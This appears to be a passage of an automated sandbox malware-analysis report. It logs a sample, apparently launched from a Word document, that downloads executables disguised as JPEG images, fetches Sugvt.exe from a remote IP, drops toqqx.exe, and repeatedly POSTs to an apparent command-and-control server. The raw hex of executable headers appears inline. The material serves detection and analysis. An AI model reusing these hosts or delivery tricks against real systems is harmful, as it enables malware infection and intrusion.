    Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:07 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Thu, 06 Jun 2019 14:01:20 GMT ETag: "217d0-58aa825fc8c00" Accept-Ranges: bytes Content-Length: 137168 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: image/jpeg
    Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:07 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Thu, 06 Jun 2019 14:01:30 GMT ETag: "6b738-58aa826952280" Accept-Ranges: bytes Content-Length: 440120 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: image/jpeg
    Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:08 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Thu, 06 Jun 2019 14:01:44 GMT ETag: "1303d0-58aa8276ac200" Accept-Ranges: bytes Content-Length: 1246160 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: image/jpeg
    Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:12 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Thu, 06 Jun 2019 14:01:52 GMT ETag: "235d0-58aa827e4d400" Accept-Ranges: bytes Content-Length: 144848 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/jpeg
    Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:12 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Thu, 06 Jun 2019 14:02:02 GMT ETag: "14748-58aa8287d6a80" Accept-Ranges: bytes Content-Length: 83784 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: image/jpeg
    Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:12 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Mon, 07 Aug 2017 05:52:20 GMT ETag: "9d9d8-5562373312d00" Accept-Ranges: bytes Content-Length: 645592 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: image/jpeg
    Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:14 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Thu, 06 Jun 2019 14:00:58 GMT ETag: "519d0-58aa824acda80" Accept-Ranges: bytes Content-Length: 334288 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: image/jpeg
    Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:15 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Thu, 06 Jun 2019 14:01:20 GMT ETag: "217d0-58aa825fc8c00" Accept-Ranges: bytes Content-Length: 137168 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: image/jpeg
    Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:15 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Thu, 06 Jun 2019 14:01:30 GMT ETag: "6b738-58aa826952280" Accept-Ranges: bytes Content-Length: 440120 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: image/jpeg
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 May 2021 19:35:16 GMTServer: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24Last-Modified: Thu, 06 Jun 2019 14:01:44 GMTETag: "1303d0-58aa8276ac200"Accept-Ranges: bytesContent-Length: 1246160Keep-Alive: timeout=5, max=95Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 May 2021 19:35:20 GMTServer: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24Last-Modified: Thu, 06 Jun 2019 14:02:02 GMTETag: "14748-58aa8287d6a80"Accept-Ranges: bytesContent-Length: 83784Keep-Alive: timeout=5, max=94Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 
00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: POST /6.jpg HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A | Content-Length: 25 | Host: 198.98.60.43 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a | Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic | HTTP traffic detected: POST /1.jpg HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A | Content-Length: 25 | Host: 198.98.60.43 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a | Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic | HTTP traffic detected: POST /2.jpg HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A | Content-Length: 25 | Host: 198.98.60.43 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a | Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic | HTTP traffic detected: POST /3.jpg HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A | Content-Length: 25 | Host: 198.98.60.43 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a | Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic | HTTP traffic detected: POST /4.jpg HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A | Content-Length: 25 | Host: 198.98.60.43 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a | Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic | HTTP traffic detected: POST /5.jpg HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A | Content-Length: 25 | Host: 198.98.60.43 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a | Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic | HTTP traffic detected: POST /6.jpg HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A | Content-Length: 25 | Host: 198.98.60.43 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a | Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic | HTTP traffic detected: POST /7.jpg HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A | Content-Length: 25 | Host: 198.98.60.43 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a | Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic | HTTP traffic detected: POST /1.jpg HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A | Content-Length: 25 | Host: 198.98.60.43 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a | Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic | HTTP traffic detected: POST /2.jpg HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A | Content-Length: 25 | Host: 198.98.60.43 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a | Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic | HTTP traffic detected: POST /main.php HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A | Content-Length: 25 | Host: 198.98.60.43 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a | Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic | HTTP traffic detected: POST /3.jpg HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A | Content-Length: 25 | Host: 198.98.60.43 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a | Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic | HTTP traffic detected: POST /4.jpg HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A | Content-Length: 25 | Host: 198.98.60.43 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a | Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A | Content-Length: 89104 | Host: 198.98.60.43 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /5.jpg HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A | Content-Length: 25 | Host: 198.98.60.43 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a | Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic | HTTP traffic detected: POST /7.jpg HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A | Content-Length: 25 | Host: 198.98.60.43 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a | Data Ascii: --1BEF0A57BE110FD467A--
Source: Joe Sandbox View | ASN Name: PONYNETUS PONYNETUS
Source: Joe Sandbox View | ASN Name: PLUSSERVER-ASN1DE PLUSSERVER-ASN1DE
Source: global traffic | HTTP traffic detected: GET /3/Sugvt.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 31.210.20.6 | Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 198.98.60.43 (50 occurrences)
Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_00421CF0 InternetSetFilePointer,InternetReadFile,_memset,HttpQueryInfoA,CoCreateInstance,_memcpy_s,_memcpy_s,
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B4C77723-97C0-4A14-814E-1968BCE52029}.tmp
Source: global traffic | HTTP traffic detected: GET /3/Sugvt.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 31.210.20.6 | Connection: Keep-Alive
Source: toqqx.exe, 0000000B.00000003.2255586151.0000000000841000.00000004.00000001.sdmp | String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: toqqx.exe, 0000000B.00000003.2255586151.0000000000841000.00000004.00000001.sdmp | String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: unknown | HTTP traffic detected: POST /6.jpg HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A | Content-Length: 25 | Host: 198.98.60.43 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a | Data Ascii: --1BEF0A57BE110FD467A--
Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmp, toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: toqqx.exe, 0000000B.00000003.2235145416.0000000000990000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: toqqx.exe, 00000004.00000003.2230164317.0000000005601000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000003.2247262155.000000000535E000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
